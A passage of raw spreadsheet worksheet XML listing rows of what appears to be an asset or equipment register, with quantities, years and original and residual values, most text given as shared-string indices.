      <c r="D57" s="238" t="s">
        <v>1508</v>
      </c>
      <c r="E57" s="238" t="s">
        <v>1509</v>
      </c>
      <c r="F57" s="11" t="s">
        <v>1510</v>
      </c>
      <c r="G57" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H57" s="11">
        <v>1</v>
      </c>
      <c r="I57" s="11">
        <v>1996</v>
      </c>
      <c r="J57" s="126">
        <v>23000</v>
      </c>
      <c r="K57" s="188">
        <v>1600</v>
      </c>
      <c r="L57" s="238" t="s">
        <v>1511</v>
      </c>
    </row>
    <row r="58" customHeight="1" spans="2:12">
      <c r="B58" s="16">
        <v>52</v>
      </c>
      <c r="C58" s="237" t="s">
        <v>1513</v>
      </c>
      <c r="D58" s="238" t="s">
        <v>1508</v>
      </c>
      <c r="E58" s="238" t="s">
        <v>1509</v>
      </c>
      <c r="F58" s="11" t="s">
        <v>1510</v>
      </c>
      <c r="G58" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H58" s="11">
        <v>1</v>
      </c>
      <c r="I58" s="11">
        <v>1996</v>
      </c>
      <c r="J58" s="126">
        <v>23000</v>
      </c>
      <c r="K58" s="188">
        <v>1600</v>
      </c>
      <c r="L58" s="238" t="s">
        <v>1511</v>
      </c>
    </row>
    <row r="59" customHeight="1" spans="2:12">
      <c r="B59" s="16">
        <v>53</v>
      </c>
      <c r="C59" s="237" t="s">
        <v>1514</v>
      </c>
      <c r="D59" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E59" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F59" s="11"/>
      <c r="G59" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H59" s="11">
        <v>12</v>
      </c>
      <c r="I59" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J59" s="126">
        <v>120000</v>
      </c>
      <c r="K59" s="188">
        <v>5568</v>
      </c>
      <c r="L59" s="238" t="s">
        <v>1511</v>
      </c>
    </row>
    <row r="60" customHeight="1" spans="2:12">
      <c r="B60" s="16">
        <v>54</v>
      </c>
      <c r="C60" s="237" t="s">
        <v>1515</v>
      </c>
      <c r="D60" s="238" t="s">
        <v>1516</v>
      </c>
      <c r="E60" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F60" s="11"/>
      <c r="G60" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H60" s="11">
        <v>1</v>
      </c>
      <c r="I60" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J60" s="126">
        <v>8800</v>
      </c>
      <c r="K60" s="188">
        <v>464</v>
      </c>
      <c r="L60" s="238" t="s">
        <v>1511</v>
      </c>
    </row>
    <row r="61" customHeight="1" spans="2:12">
      <c r="B61" s="16">
        <v>55</v>
      </c>
      <c r="C61" s="237" t="s">
        <v>1517</v>
      </c>
      <c r="D61" s="238" t="s">
        <v>1451</v>
      </c>
      <c r="E61" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F61" s="11"/>
      <c r="G61" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H61" s="11">
        <v>2</v>
      </c>
      <c r="I61" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J61" s="126">
        <v>2200</v>
      </c>
      <c r="K61" s="188">
        <v>928</v>
      </c>
      <c r="L61" s="238" t="s">
        <v>1511</v>
      </c>
    </row>
    <row r="62" customHeight="1" spans="2:12">
      <c r="B62" s="16">
        <v>56</v>
      </c>
      <c r="C62" s="237" t="s">
        <v>1518</v>
      </c>
      <c r="D62" s="238" t="s">
        <v>1519</v>
      </c>
      <c r="E62" s="238" t="s">
        <v>1520</v>
      </c>
      <c r="F62" s="11"/>
      <c r="G62" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H62" s="11">
        <v>5</v>
      </c>
      <c r="I62" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J62" s="126">
        <v>5500</v>
      </c>
      <c r="K62" s="188">
        <v>704</v>
      </c>
      <c r="L62" s="238" t="s">
        <v>1511</v>
      </c>
    </row>
    <row r="63" customHeight="1" spans="2:12">
      <c r="B63" s="16">
        <v>57</v>
      </c>
      <c r="C63" s="237" t="s">
        <v>1521</v>
      </c>
      <c r="D63" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="E63" s="238" t="s">
        <v>1523</v>
      </c>
      <c r="F63" s="11" t="s">
        <v>1524</v>
      </c>
      <c r="G63" s="16"/>
      <c r="H63" s="11">
        <v>1</v>
      </c>
      <c r="I63" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J63" s="126">
        <v>486000</v>
      </c>
      <c r="K63" s="188">
        <v>0</v>
      </c>
      <c r="L63" s="238" t="s">
        <v>1525</v>
      </c>
    </row>
    <row r="64" customHeight="1" spans="2:12">
      <c r="B64" s="16">
        <v>58</v>
      </c>
      <c r="C64" s="11"/>
      <c r="D64" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="E64" s="238" t="s">
        <v>1526</v>
      </c>
      <c r="F64" s="11" t="s">
        <v>1524</v>
      </c>
      <c r="G64" s="16"/>
      <c r="H64" s="11">
        <v>1</v>
      </c>
      <c r="I64" s="11">
        <v>2005</v>
      </c>
      <c r="J64" s="14"/>
      <c r="K64" s="188">
        <v>0</v>
      </c>
      <c r="L64" s="238" t="s">
        <v>1525</v>
      </c>
    </row>
    <row r="65" customHeight="1" spans="2:12">
      <c r="B65" s="16">
        <v>59</v>
      </c>
      <c r="C65" s="237" t="s">
        <v>1527</v>
      </c>
      <c r="D65" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E65" s="238" t="s">
        <v>1528</v>
      </c>
      <c r="F65" s="11"/>
      <c r="G65" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H65" s="11">
        <v>3</v>
      </c>
      <c r="I65" s="237" t="s">
        <v>322</v>
      </c>
      <c r="J65" s="126">
        <v>110400</v>
      </c>
      <c r="K65" s="188">
        <v>33600</v>
      </c>
      <c r="L65" s="238" t="s">
        <v>1529</v>
      </c>
    </row>
    <row r="66" customHeight="1" spans="2:12">
      <c r="B66" s="16">
        <v>60</v>
      </c>
      <c r="C66" s="237" t="s">
        <v>1530</v>
      </c>
      <c r="D66" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E66" s="238" t="s">
        <v>1531</v>
      </c>
      <c r="F66" s="11"/>
      <c r="G66" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H66" s="11">
        <v>3</v>
      </c>
      <c r="I66" s="237" t="s">
        <v>1532</v>
      </c>
      <c r="J66" s="126">
        <v>75000</v>
      </c>
      <c r="K66" s="188">
        <v>38400</v>
      </c>
      <c r="L66" s="238" t="s">
        <v>1529</v>
      </c>
    </row>
    <row r="67" customHeight="1" spans="2:12">
      <c r="B67" s="16">
        <v>61</v>
      </c>
      <c r="C67" s="237" t="s">
        <v>1533</v>
      </c>
      <c r="D67" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E67" s="238" t="s">
        <v>1528</v>
      </c>
      <c r="F67" s="11"/>
      <c r="G67" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H67" s="11">
        <v>3</v>
      </c>
      <c r="I67" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J67" s="126">
        <v>114969</v>
      </c>
      <c r="K67" s="188">
        <v>43200</v>
      </c>
      <c r="L67" s="238" t="s">
        <v>1529</v>
      </c>
    </row>
    <row r="68" customHeight="1" spans="2:12">
      <c r="B68" s="16">
        <v>62</v>
      </c>
      <c r="C68" s="237" t="s">
        <v>1534</v>
      </c>
      <c r="D68" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E68" s="238" t="s">
        <v>1528</v>
      </c>
      <c r="F68" s="11"/>
      <c r="G68" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H68" s="11">
        <v>3</v>
      </c>
      <c r="I68" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J68" s="126">
        <v>116884</v>
      </c>
      <c r="K68" s="188">
        <v>43200</v>
      </c>
      <c r="L68" s="238" t="s">
        <v>1529</v>
      </c>
    </row>
    <row r="69" customHeight="1" spans="2:12">
      <c r="B69" s="16">
        <v>63</v>
      </c>
      <c r="C69" s="237" t="s">
        <v>1535</v>
      </c>
      <c r="D69" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E69" s="238" t="s">
        <v>1528</v>
      </c>
      <c r="F69" s="11"/>
      <c r="G69" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H69" s="11">
        <v>2</v>
      </c>
      <c r="I69" s="237" t="s">
        <v>556</v>
      </c>
      <c r="J69" s="126">
        <v>75147</v>
      </c>
      <c r="K69" s="188">
        <v>28800</v>
      </c>
      <c r="L69" s="238" t="s">
        <v>1529</v>
      </c>
    </row>
    <row r="70" customHeight="1" spans="2:12">
      <c r="B70" s="16">
        <v>64</v>
      </c>
      <c r="C70" s="237" t="s">
        <v>1536</v>
      </c>
      <c r="D70" s="238" t="s">
        <v>1537</v>
      </c>
      <c r="E70" s="238" t="s">
        <v>1538</v>
      </c>
      <c r="F70" s="11"/>
      <c r="G70" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H70" s="11">
        <v>1</v>
      </c>
      <c r="I70" s="237" t="s">
        <v>1539</v>
      </c>
      <c r="J70" s="126">
        <v>116600</v>
      </c>
      <c r="K70" s="188">
        <v>22387.2</v>
      </c>
      <c r="L70" s="238" t="s">
        <v>1540</v>
      </c>
    </row>
    <row r="71" customHeight="1" spans="2:12">
      <c r="B71" s="16">
        <v>65</v>
      </c>
      <c r="C71" s="237" t="s">
        <v>1541</v>
      </c>
      <c r="D71" s="238" t="s">
        <v>1542</v>
      </c>
      <c r="E71" s="238" t="s">
        <v>1543</v>
      </c>
      <c r="F71" s="11"/>
      <c r="G71" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H71" s="11">
        <v>1</v>
      </c>
      <c r="I71" s="237" t="s">
        <v>1544</v>
      </c>
      <c r="J71" s="126">
        <v>1856000</v>
      </c>
      <c r="K71" s="188">
        <v>593920</v>
      </c>
      <c r="L71" s="238" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="72" customHeight="1" spans="2:12">
      <c r="B72" s="16">
        <v>66</v>
      </c>
      <c r="C72" s="237" t="s">
        <v>1546</v>
      </c>
      <c r="D72" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="E72" s="238" t="s">
        <v>1547</v>
      </c>
      <c r="F72" s="11" t="s">
        <v>1524</v>
      </c>
      <c r="G72" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H72" s="11">
        <v>1</v>
      </c>
      <c r="I72" s="237" t="s">
        <v>224</v>
      </c>
      <c r="J72" s="126">
        <v>810000</v>
      </c>
      <c r="K72" s="188">
        <v>155520</v>
      </c>
      <c r="L72" s="238" t="s">
        <v>1548</v>
      </c>
    </row>
    <row r="73" customHeight="1" spans="2:12">
      <c r="B73" s="16">
        <v>67</v>
      </c>
      <c r="C73" s="237" t="s">
        <v>1549</v>
      </c>
      <c r="D73" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E73" s="238" t="s">
        <v>1452</v>
      </c>
      <c r="F73" s="11"/>
      <c r="G73" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H73" s="11">
        <v>1</v>
      </c>
      <c r="I73" s="237" t="s">
        <v>871</v>
      </c>
      <c r="J73" s="126">
        <v>8276</v>
      </c>
      <c r="K73" s="188">
        <v>1160</v>
      </c>
      <c r="L73" s="238" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="74" customHeight="1" spans="2:12">
      <c r="B74" s="16">
        <v>68</v>
      </c>
      <c r="C74" s="237" t="s">
        <v>1551</v>
      </c>
      <c r="D74" s="238" t="s">
        <v>1492</v>
      </c>
      <c r="E74" s="238" t="s">
        <v>1452</v>
      </c>
      <c r="F74" s="11"/>
      <c r="G74" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H74" s="11">
        <v>1</v>
      </c>
      <c r="I74" s="237" t="s">
        <v>871</v>
      </c>
      <c r="J74" s="126">
        <v>10000</v>
      </c>
      <c r="K74" s="188">
        <v>1160</v>
      </c>
      <c r="L74" s="238" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="75" customHeight="1" spans="2:12">
      <c r="B75" s="16">
        <v>69</v>
      </c>
      <c r="C75" s="237" t="s">
        <v>1552</v>
      </c>
      <c r="D75" s="238" t="s">
        <v>1553</v>
      </c>
      <c r="E75" s="238" t="s">
        <v>1554</v>
      </c>
      <c r="F75" s="11"/>
      <c r="G75" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H75" s="11">
        <v>4</v>
      </c>
      <c r="I75" s="237" t="s">
        <v>1539</v>
      </c>
      <c r="J75" s="126">
        <v>87800</v>
      </c>
      <c r="K75" s="188">
        <v>5568</v>
      </c>
      <c r="L75" s="238" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="76" customHeight="1" spans="2:12">
      <c r="B76" s="16">
        <v>70</v>
      </c>
      <c r="C76" s="237" t="s">
        <v>1555</v>
      </c>
      <c r="D76" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="E76" s="238" t="s">
        <v>1556</v>
      </c>
      <c r="F76" s="11"/>
      <c r="G76" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H76" s="11">
        <v>1</v>
      </c>
      <c r="I76" s="237" t="s">
        <v>1557</v>
      </c>
      <c r="J76" s="126">
        <v>50427.35</v>
      </c>
      <c r="K76" s="188">
        <v>0</v>
      </c>
      <c r="L76" s="238" t="s">
        <v>1328</v>
      </c>
    </row>
    <row r="77" customHeight="1" spans="2:12">
      <c r="B77" s="16">
        <v>71</v>
      </c>
      <c r="C77" s="237" t="s">
        <v>1558</v>
      </c>
      <c r="D77" s="238" t="s">
        <v>1559</v>
      </c>
      <c r="E77" s="238" t="s">
        <v>1560</v>
      </c>
      <c r="F77" s="11"/>
      <c r="G77" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H77" s="11">
        <v>2</v>
      </c>
      <c r="I77" s="237" t="s">
        <v>1195</v>
      </c>
      <c r="J77" s="126">
        <v>31623.93</v>
      </c>
      <c r="K77" s="188">
        <v>26880</v>
      </c>
      <c r="L77" s="238" t="s">
        <v>1328</v>
      </c>
    </row>
    <row r="78" customHeight="1" spans="2:12">
      <c r="B78" s="16">
        <v>72</v>
      </c>
      <c r="C78" s="237" t="s">
        <v>1561</v>
      </c>
      <c r="D78" s="238" t="s">
        <v>1562</v>
      </c>
      <c r="E78" s="238" t="s">
        <v>1563</v>
      </c>
      <c r="F78" s="11" t="s">
        <v>1263</v>
      </c>
      <c r="G78" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H78" s="11">
        <v>2</v>
      </c>
      <c r="I78" s="237" t="s">
        <v>472</v>
      </c>
      <c r="J78" s="126">
        <v>8547.01</v>
      </c>
      <c r="K78" s="188">
        <v>3840</v>
      </c>
      <c r="L78" s="238" t="s">
        <v>1564</v>
      </c>
    </row>
    <row r="79" customHeight="1" spans="2:12">
      <c r="B79" s="16">
        <v>73</v>
      </c>
      <c r="C79" s="237" t="s">
        <v>1565</v>
      </c>
      <c r="D79" s="238" t="s">
        <v>1566</v>
      </c>
      <c r="E79" s="238" t="s">
        <v>1567</v>
      </c>
      <c r="F79" s="11" t="s">
        <v>1568</v>
      </c>
      <c r="G79" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H79" s="11">
        <v>1</v>
      </c>
      <c r="I79" s="237" t="s">
        <v>776</v>
      </c>
      <c r="J79" s="126">
        <v>4914529.9</v>
      </c>
      <c r="K79" s="188">
        <v>2038400</v>
      </c>
      <c r="L79" s="10" t="s">
        <v>1569</v>
      </c>
    </row>
    <row r="80" customHeight="1" spans="2:12">
      <c r="B80" s="16">
        <v>74</v>
      </c>
      <c r="C80" s="237" t="s">
        <v>1570</v>
      </c>
      <c r="D80" s="238" t="s">
        <v>1571</v>
      </c>
      <c r="E80" s="238" t="s">
        <v>1572</v>
      </c>
      <c r="F80" s="11"/>
      <c r="G80" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H80" s="11">
        <v>1</v>
      </c>
      <c r="I80" s="237" t="s">
        <v>452</v>
      </c>
      <c r="J80" s="126">
        <v>23897.45</v>
      </c>
      <c r="K80" s="188">
        <v>11040</v>
      </c>
      <c r="L80" s="10" t="s">
        <v>1569</v>
      </c>
    </row>
    <row r="81" customHeight="1" spans="2:12">
      <c r="B81" s="16">
        <v>75</v>
      </c>
      <c r="C81" s="237" t="s">
        <v>1573</v>
      </c>
      <c r="D81" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E81" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F81" s="11"/>
      <c r="G81" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H81" s="11">
        <v>1</v>
      </c>
      <c r="I81" s="237" t="s">
        <v>962</v>
      </c>
      <c r="J81" s="126">
        <v>16010</v>
      </c>
      <c r="K81" s="188">
        <v>2561.6</v>
      </c>
      <c r="L81" s="238" t="s">
        <v>1574</v>
      </c>
    </row>
    <row r="82" customHeight="1" spans="2:12">
      <c r="B82" s="16">
        <v>76</v>
      </c>
      <c r="C82" s="237" t="s">
        <v>1575</v>
      </c>
      <c r="D82" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E82" s="238" t="s">
        <v>1576</v>
      </c>
      <c r="F82" s="11"/>
      <c r="G82" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H82" s="11">
        <v>4</v>
      </c>
      <c r="I82" s="237" t="s">
        <v>1497</v>
      </c>
      <c r="J82" s="126">
        <v>102000</v>
      </c>
      <c r="K82" s="188">
        <v>16320</v>
      </c>
      <c r="L82" s="238" t="s">
        <v>1577</v>
      </c>
    </row>
    <row r="83" customHeight="1" spans="2:12">
      <c r="B83" s="16">
        <v>77</v>
      </c>
      <c r="C83" s="237" t="s">
        <v>1578</v>
      </c>
      <c r="D83" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E83" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F83" s="11"/>
      <c r="G83" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H83" s="11">
        <v>1</v>
      </c>
      <c r="I83" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J83" s="126">
        <v>8800</v>
      </c>
      <c r="K83" s="188">
        <v>1126.4</v>
      </c>
      <c r="L83" s="238" t="s">
        <v>1579</v>
      </c>
    </row>
    <row r="84" customHeight="1" spans="2:12">
      <c r="B84" s="16">
        <v>78</v>
      </c>
      <c r="C84" s="237" t="s">
        <v>1580</v>
      </c>
      <c r="D84" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E84" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F84" s="11"/>
      <c r="G84" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H84" s="11">
        <v>3</v>
      </c>
      <c r="I84" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J84" s="126">
        <v>1370</v>
      </c>
      <c r="K84" s="188">
        <v>960</v>
      </c>
      <c r="L84" s="238" t="s">
        <v>1579</v>
      </c>
    </row>
    <row r="85" customHeight="1" spans="2:12">
      <c r="B85" s="16">
        <v>79</v>
      </c>
      <c r="C85" s="237" t="s">
        <v>1581</v>
      </c>
      <c r="D85" s="238" t="s">
        <v>1378</v>
      </c>
      <c r="E85" s="238" t="s">
        <v>1485</v>
      </c>
      <c r="F85" s="11"/>
      <c r="G85" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H85" s="11">
        <v>1</v>
      </c>
      <c r="I85" s="237" t="s">
        <v>1079</v>
      </c>
      <c r="J85" s="126">
        <v>22810.01</v>
      </c>
      <c r="K85" s="188">
        <v>5109.44224</v>
      </c>
      <c r="L85" s="238" t="s">
        <v>1582</v>
      </c>
    </row>
    <row r="86" customHeight="1" spans="2:12">
      <c r="B86" s="16">
        <v>80</v>
      </c>
      <c r="C86" s="237" t="s">
        <v>1583</v>
      </c>
      <c r="D86" s="238" t="s">
        <v>1584</v>
      </c>
      <c r="E86" s="238" t="s">
        <v>1585</v>
      </c>
      <c r="F86" s="11"/>
      <c r="G86" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H86" s="11">
        <v>3</v>
      </c>
      <c r="I86" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J86" s="126">
        <v>20000</v>
      </c>
      <c r="K86" s="188">
        <v>2560</v>
      </c>
      <c r="L86" s="238" t="s">
        <v>1095</v>
      </c>
    </row>
    <row r="87" customHeight="1" spans="2:12">
      <c r="B87" s="16">
        <v>81</v>
      </c>
      <c r="C87" s="237" t="s">
        <v>1586</v>
      </c>
      <c r="D87" s="238" t="s">
        <v>1587</v>
      </c>
      <c r="E87" s="238" t="s">
        <v>1585</v>
      </c>
      <c r="F87" s="11"/>
      <c r="G87" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H87" s="11">
        <v>2</v>
      </c>
      <c r="I87" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J87" s="126">
        <v>13000</v>
      </c>
      <c r="K87" s="188">
        <v>1664</v>
      </c>
      <c r="L87" s="238" t="s">
        <v>1095</v>
      </c>
    </row>
    <row r="88" customHeight="1" spans="2:12">
      <c r="B88" s="16">
        <v>82</v>
      </c>
      <c r="C88" s="237" t="s">
        <v>1588</v>
      </c>
      <c r="D88" s="238" t="s">
        <v>1589</v>
      </c>
      <c r="E88" s="238" t="s">
        <v>1590</v>
      </c>
      <c r="F88" s="11" t="s">
        <v>1591</v>
      </c>
      <c r="G88" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H88" s="11">
        <v>1</v>
      </c>
      <c r="I88" s="237" t="s">
        <v>1417</v>
      </c>
      <c r="J88" s="126">
        <v>75213.68</v>
      </c>
      <c r="K88" s="188">
        <v>31200</v>
      </c>
      <c r="L88" s="238" t="s">
        <v>1592</v>
      </c>
    </row>
    <row r="89" customHeight="1" spans="2:12">
      <c r="B89" s="16">
        <v>83</v>
      </c>
      <c r="C89" s="237" t="s">
        <v>1593</v>
      </c>
      <c r="D89" s="238" t="s">
        <v>1500</v>
      </c>
      <c r="E89" s="238" t="s">
        <v>1594</v>
      </c>
      <c r="F89" s="11" t="s">
        <v>1591</v>
      </c>
      <c r="G89" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H89" s="11">
        <v>2</v>
      </c>
      <c r="I89" s="237" t="s">
        <v>1417</v>
      </c>
      <c r="J89" s="126">
        <v>59829.06</v>
      </c>
      <c r="K89" s="188">
        <v>24960</v>
      </c>
      <c r="L89" s="238" t="s">
        <v>1592</v>
      </c>
    </row>
    <row r="90" customHeight="1" spans="2:12">
      <c r="B90" s="16">
        <v>84</v>
      </c>
      <c r="C90" s="237" t="s">
        <v>1595</v>
      </c>
      <c r="D90" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="E90" s="238" t="s">
        <v>1596</v>
      </c>
      <c r="F90" s="11" t="s">
        <v>1524</v>
      </c>
      <c r="G90" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H90" s="11">
        <v>1</v>
      </c>
      <c r="I90" s="237" t="s">
        <v>1597</v>
      </c>
      <c r="J90" s="126">
        <v>141025.64</v>
      </c>
      <c r="K90" s="188">
        <v>0</v>
      </c>
      <c r="L90" s="238" t="s">
        <v>1598</v>
      </c>
    </row>
    <row r="91" customHeight="1" spans="2:12">
      <c r="B91" s="16">
        <v>85</v>
      </c>
      <c r="C91" s="11"/>
      <c r="D91" s="10" t="s">
        <v>1522</v>
      </c>
      <c r="E91" s="10" t="s">
        <v>1599</v>
      </c>
      <c r="F91" s="11" t="s">
        <v>1524</v>
      </c>
      <c r="G91" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H91" s="11">
        <v>1</v>
      </c>
      <c r="I91" s="11">
        <v>2008</v>
      </c>
      <c r="J91" s="14"/>
      <c r="K91" s="188">
        <v>12000</v>
      </c>
      <c r="L91" s="238" t="s">
        <v>1598</v>
      </c>
    </row>
    <row r="92" customHeight="1" spans="2:12">
      <c r="B92" s="16">
        <v>86</v>
      </c>
      <c r="C92" s="237" t="s">
        <v>1600</v>
      </c>
      <c r="D92" s="238" t="s">
        <v>1412</v>
      </c>
      <c r="E92" s="238" t="s">
        <v>1601</v>
      </c>
      <c r="F92" s="11"/>
      <c r="G92" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H92" s="11">
        <v>7</v>
      </c>
      <c r="I92" s="237" t="s">
        <v>1602</v>
      </c>
      <c r="J92" s="126">
        <v>53000</v>
      </c>
      <c r="K92" s="188">
        <v>156800</v>
      </c>
      <c r="L92" s="238" t="s">
        <v>1603</v>
      </c>
    </row>
    <row r="93" customHeight="1" spans="2:12">
      <c r="B93" s="16">
        <v>87</v>
      </c>
      <c r="C93" s="237" t="s">
        <v>1604</v>
      </c>
      <c r="D93" s="238" t="s">
        <v>1348</v>
      </c>
      <c r="E93" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F93" s="11"/>
      <c r="G93" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H93" s="11">
        <v>1</v>
      </c>
      <c r="I93" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J93" s="126">
        <v>10000</v>
      </c>
      <c r="K93" s="188">
        <v>1280</v>
      </c>
      <c r="L93" s="238" t="s">
        <v>1605</v>
      </c>
    </row>
    <row r="94" customHeight="1" spans="2:12">
      <c r="B94" s="16">
        <v>88</v>
      </c>
      <c r="C94" s="237" t="s">
        <v>1606</v>
      </c>
      <c r="D94" s="238" t="s">
        <v>1348</v>
      </c>
      <c r="E94" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F94" s="11"/>
      <c r="G94" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H94" s="11">
        <v>7</v>
      </c>
      <c r="I94" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J94" s="126">
        <v>8800</v>
      </c>
      <c r="K94" s="188">
        <v>7168</v>
      </c>
      <c r="L94" s="238" t="s">
        <v>1605</v>
      </c>
    </row>
    <row r="95" customHeight="1" spans="2:12">
      <c r="B95" s="16">
        <v>89</v>
      </c>
      <c r="C95" s="237" t="s">
        <v>1607</v>
      </c>
      <c r="D95" s="238" t="s">
        <v>1348</v>
      </c>
      <c r="E95" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F95" s="11"/>
      <c r="G95" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H95" s="11">
        <v>2</v>
      </c>
      <c r="I95" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J95" s="126">
        <v>8800</v>
      </c>
      <c r="K95" s="188">
        <v>204.8</v>
      </c>
      <c r="L95" s="238" t="s">
        <v>1605</v>
      </c>
    </row>
    <row r="96" customHeight="1" spans="2:12">
      <c r="B96" s="16">
        <v>90</v>
      </c>
      <c r="C96" s="237" t="s">
        <v>1608</v>
      </c>
      <c r="D96" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E96" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F96" s="11"/>
      <c r="G96" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H96" s="11">
        <v>2</v>
      </c>
      <c r="I96" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J96" s="126">
        <v>8800</v>
      </c>
      <c r="K96" s="188">
        <v>1856</v>
      </c>
      <c r="L96" s="238" t="s">
        <v>1605</v>
      </c>
    </row>
    <row r="97" customHeight="1" spans="2:12">
      <c r="B97" s="16">
        <v>91</v>
      </c>
      <c r="C97" s="237" t="s">
        <v>1609</v>
      </c>
      <c r="D97" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E97" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F97" s="11"/>
      <c r="G97" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H97" s="11">
        <v>1</v>
      </c>
      <c r="I97" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J97" s="126">
        <v>10000</v>
      </c>
      <c r="K97" s="188">
        <v>928</v>
      </c>
      <c r="L97" s="238" t="s">
        <v>1605</v>
      </c>
    </row>
    <row r="98" customHeight="1" spans="2:12">
      <c r="B98" s="16">
        <v>92</v>
      </c>
      <c r="C98" s="237" t="s">
        <v>1610</v>
      </c>
      <c r="D98" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E98" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F98" s="11"/>
      <c r="G98" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H98" s="11">
        <v>1</v>
      </c>
      <c r="I98" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J98" s="126">
        <v>10000</v>
      </c>
      <c r="K98" s="188">
        <v>928</v>
      </c>
      <c r="L98" s="238" t="s">
        <v>1605</v>
      </c>
    </row>
    <row r="99" customHeight="1" spans="2:12">
      <c r="B99" s="16">
        <v>93</v>
      </c>
      <c r="C99" s="237" t="s">
        <v>1611</v>
      </c>
      <c r="D99" s="238" t="s">
        <v>1492</v>
      </c>
      <c r="E99" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F99" s="11" t="s">
        <v>1263</v>
      </c>
      <c r="G99" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H99" s="11">
        <v>8</v>
      </c>
      <c r="I99" s="11">
        <v>1992</v>
      </c>
      <c r="J99" s="126">
        <v>44000</v>
      </c>
      <c r="K99" s="188">
        <v>1856</v>
      </c>
      <c r="L99" s="238" t="s">
        <v>1612</v>
      </c>
    </row>
    <row r="100" customHeight="1" spans="2:12">
      <c r="B100" s="16">
        <v>94</v>
      </c>
      <c r="C100" s="237" t="s">
        <v>1613</v>
      </c>
      <c r="D100" s="238" t="s">
        <v>1478</v>
      </c>
      <c r="E100" s="10"/>
      <c r="F100" s="11"/>
      <c r="G100" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H100" s="11">
        <v>8</v>
      </c>
      <c r="I100" s="237" t="s">
        <v>229</v>
      </c>
